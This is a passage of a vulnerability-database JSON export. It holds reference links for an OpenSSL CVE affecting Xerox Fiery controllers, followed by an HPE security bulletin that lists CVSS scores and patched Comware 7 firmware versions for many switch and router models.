"https://nvd.nist.gov/vuln/detail/cve-2011-4109" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4619" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4576" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4108" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2011-4109.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2011-4576.html" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2011-4619.html" }, { "trust": 0.4, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "http://www.attachmate.com/" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001530" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001529" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_potential_security_exposure_when_using_ibm_infosphere_streams_due_to_vulnerabilities_in_ibm_java_se_version_6_sdk6?lang=en_us" }, { "trust": 0.3, "url": "https://www14.software.ibm.com/webapp/iwm/web/prelogin.do?source=aixbp" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100157565" }, { "trust": 0.3, "url": "http://blog.pfsense.org/?p=676" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21637929" }, { "trust": 0.3, "url": "https://www.ibm.com/connections/blogs/psirt/entry/security_bulletin_ibm_tivoli_netcool_system_service_monitors_application_service_monitors_is_affected_by_multiple_openssl_vulnerabilities?lang=en_us" }, { "trust": 0.3, "url": "http://support.attachmate.com/techdocs/1708.html" }, { "trust": 0.3, "url": "http://support.attachmate.com/techdocs/2502.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631429" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21626257" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21651196" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100156631" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100156392" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100157969" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100161892" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100161590" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21650623" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643698" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas12088ececb530423186257b410072035e" }, { "trust": 0.3, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03315912" }, { "trust": 0.3, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041" }, { "trust": 0.3, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03383940" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638022" }, { "trust": 0.3, "url": "https://www.ibm.com/support/docview.wss?uid=swg21619837" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631322" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001560" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24030251" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24033501" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004323" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643442" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21625170" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21651176" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21627934" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21633107" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21635888" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638670" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643439" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643437" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15314.html" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15388.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15389.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15395.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15460.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15461.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004564" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643316" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2012-0013.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100158312" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100150578" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100156392" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0884" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2011-4108.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2110" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2333" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-2333.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1165" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-2110.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-0884.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1165.html" }, { "trust": 0.2, "url": "https://access.redhat.com/kb/docs/doc-11259" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4576" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4109" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4619" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3210" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4577" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0027" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/399.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2012:0060" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/1357-1/" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=5.1.2" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.0.0" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2012-0168.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0029.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0029" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0207.html" }, { "trust": 0.1, "url": "https://docs.redhat.com/docs/en-us/red_hat_enterprise_virtualization_for_servers/2.2/html/technical_notes/index.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0207" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-12:01/openssl.patch" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2110" }, { "trust": 0.1, "url": "http://security.freebsd.org/advisories/freebsd-sa-12:01.openssl.asc" }, { "trust": 0.1, "url": "http://lists.openwall.net/full-disclosure/2012/04/19/4" }, { "trust": 0.1, "url": "http://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "http://www.openssl.org/news/secadv_20120419.txt" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-12:01/openssl.patch.asc" }, { "trust": 0.1, "url": "http://www.freebsd.org/handbook/makeworld.html\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0884" }, { "trust": 0.1, "url": "http://www.openssl.org/news/secadv_20120312.txt" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8g-4ubuntu3.15" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-1357-1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1945" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8o-1ubuntu4.6" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4354" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8o-5ubuntu1.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.8" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.0e-2ubuntu4.2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0050" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2012-0060.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0027" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4108" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/advisories" }, { "trust": 0.1, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c02964430" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4109" }, { "db": "BID", "id": "51281" }, { "db": "PACKETSTORM", "id": "116824" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "112452" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "109055" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "109073" }, { "db": "NVD", "id": "CVE-2011-4109" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4109" }, { "db": "BID", "id": "51281" }, { "db": "PACKETSTORM", "id": "116824" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "112452" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "109055" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "109073" }, { "db": "NVD", "id": "CVE-2011-4109" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-03-18T00:00:00", "db": "CERT/CC", "id": "VU#737740" }, { "date": "2012-01-06T00:00:00", "db": "VULMON", "id": "CVE-2011-4109" }, { "date": "2012-01-05T00:00:00", "db": "BID", "id": "51281" }, { "date": "2012-09-25T00:15:05", "db": "PACKETSTORM", "id": "116824" }, { "date": "2012-09-25T00:15:41", "db": "PACKETSTORM", "id": "116826" }, { "date": "2012-02-21T15:34:06", "db": "PACKETSTORM", "id": "110012" }, { "date": "2012-05-03T23:13:24", "db": "PACKETSTORM", "id": "112452" }, { "date": "2012-02-10T07:44:13", "db": "PACKETSTORM", "id": "109614" }, { "date": "2012-01-24T23:59:19", "db": "PACKETSTORM", "id": "109055" }, { "date": "2012-01-17T01:20:23", "db": "PACKETSTORM", "id": "108735" }, { "date": "2012-01-25T16:35:29", "db": "PACKETSTORM", "id": "109073" }, { "date": "2012-01-06T01:55:00.830000", "db": "NVD", "id": "CVE-2011-4109" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-05-02T00:00:00", "db": "CERT/CC", "id": "VU#737740" }, { "date": "2017-08-29T00:00:00", "db": "VULMON", "id": "CVE-2011-4109" }, { "date": "2015-04-13T21:31:00", "db": "BID", "id": "51281" }, { "date": "2017-08-29T01:30:27.507000", "db": "NVD", "id": "CVE-2011-4109" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "51281" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL", "sources": [ { "db": "CERT/CC", "id": "VU#737740" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "51281" } ], "trust": 0.3 } }
var-201605-0079
Vulnerability from variot
The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding. OpenSSL is prone to a local denial-of-service vulnerability. An attacker may exploit this issue to crash the application or consume excessive amount of data, resulting in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03756en_us
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: hpesbhf03756en_us Version: 1
HPESBHF03756 rev.1 - HPE Network Products including Comware 7, iMC, and VCX running OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2017-06-05 Last Updated: 2017-06-05
Potential Security Impact: Remote: Denial of Service (DoS), Disclosure of Sensitive Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities with OpenSSL have been addressed for HPE network products including Comware 7, iMC, and VCX. The vulnerabilities could be remotely exploited resulting in Denial of Service (DoS) or disclosure of sensitive information.
References:
- CVE-2016-2105 - Remote Denial of Service (DoS)
- CVE-2016-2106 - Remote Denial of Service (DoS)
- CVE-2016-2107 - Remote disclosure of sensitive information
- CVE-2016-2108 - Remote Denial of Service (DoS)
- CVE-2016-2109 - Remote Denial of Service (DoS)
- CVE-2016-2176 - Remote Denial of Service (DoS)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- VCX Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- Comware v7 (CW7) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- HP Intelligent Management Center (iMC) All versions - Please refer to the RESOLUTION below for a list of updated products.
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2016-2105
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2106
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2107
3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CVE-2016-2108
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE-2016-2109
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CVE-2016-2176
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has made the following software updates available to resolve the vulnerabilities in the Comware 7, iMC and VCX products running OpenSSL.
COMWARE 7 Products
- 12500 (Comware 7) - Version: R7377P02
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 10500 (Comware 7) - Version: R7184
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5900/5920 (Comware 7) - Version: R2422P02
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR1000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR2000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR3000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR4000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- VSR (Comware 7) - Version: E0324
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 7900 (Comware 7) - Version: R2152
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5130 (Comware 7) - Version: R3115
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 6125XLG - Version: R2422P02
- HP Network Products
- 711307-B21 HP 6125XLG Blade Switch
- 737230-B21 HP 6125XLG Blade Switch with TAA
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 6127XLG - Version: R2422P02
- HP Network Products
- 787635-B21 HP 6127XLG Blade Switch Opt Kit
- 787635-B22 HP 6127XLG Blade Switch with TAA
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- Moonshot - Version: R2432
- HP Network Products
- 786617-B21 - HP Moonshot-45Gc Switch Module
- 704654-B21 - HP Moonshot-45XGc Switch Module
- 786619-B21 - HP Moonshot-180XGc Switch Module
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5700 (Comware 7) - Version: R2422P02
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5930 (Comware 7) - Version: R2422P02
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 1950 (Comware 7) - Version: R3115
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 7500 (Comware 7) - Version: R7184
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5510HI (Comware 7) - Version: R1120P10
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5130HI (Comware 7) - Version: R1120P10
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5940 - Version: R2509
- HP Network Products
- JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch
- JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch
- JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch
- JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch
- JH396A HPE FlexFabric 5940 32QSFP+ Switch
- JH397A HPE FlexFabric 5940 2-slot Switch
- JH398A HPE FlexFabric 5940 4-slot Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
